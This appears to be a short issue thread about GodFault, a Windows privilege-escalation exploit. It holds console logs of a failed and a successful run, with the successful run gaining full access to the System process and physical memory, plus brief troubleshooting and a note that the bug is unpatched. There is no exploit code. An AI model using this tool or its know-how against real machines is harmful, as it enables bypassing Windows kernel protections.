[?] Server does not appear to be running. Attempting to install it...
[+] GetShellcode: 2304 bytes of shellcode written over DLL entrypoint
[+] CSRSS PID is 780
[+] Benign: C:\Windows\System32\EventAggregation.dll.bak
[+] Payload: C:\GodFaultTemp\GodFaultPayload.dll
[+] Placeholder: C:\GodFaultTemp\EventAggregationPH.dll
[+] Acquired exclusive oplock to file: C:\Windows\System32\devobj.dll
[+] Testing initial ability to acquire PROCESS_ALL_ACCESS to System: Failure
[+] Ready. Spawning WinTcb.
[+] SpawnPPL: Waiting for child process to finish.
[!] SpawnPPL: WaitForSingleObject returned 258. Expected WAIT_OBJECT_0. GLE: 5
[!] Server does not appear to be running.
[+] No cleanup necessary. Backup does not exist.

services.exe spawned does not use any CPU, maybe its my pc

It's probably some other software on your machine touching the placeholder before services.exe can. It works on the latest Win11 23H2.

Microsoft Windows [Version 10.0.22631.2861]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\System32>cd \Users\user\Desktop

C:\Users\user\Desktop>GodFault.exe
 [?] Server does not appear to be running.  Attempting to install it...
 [+] CSRSS PID is 628
 [+] Testing initial ability to acquire PROCESS_ALL_ACCESS to System: Failure
 [+] Ready.  Spawning WinTcb.
 [+] SpawnPPL: Waiting for child process to finish.
 [+] Thread 4308 (KTHREAD FFFFDF88F28A8080) has been blessed by GodFault
 [+] Testing post-exploit ability to acquire PROCESS_ALL_ACCESS to System: Success
 [+] Opened \Device\PhysicalMemory.  Handle is 0x1b0
 [+] Opened System process as PROCESS_ALL_ACCESS.  Handle is 0x1b8
 [+] Press any key to continue...

MS tried to patch it in November, but that fell through. It will hopefully get patched soon.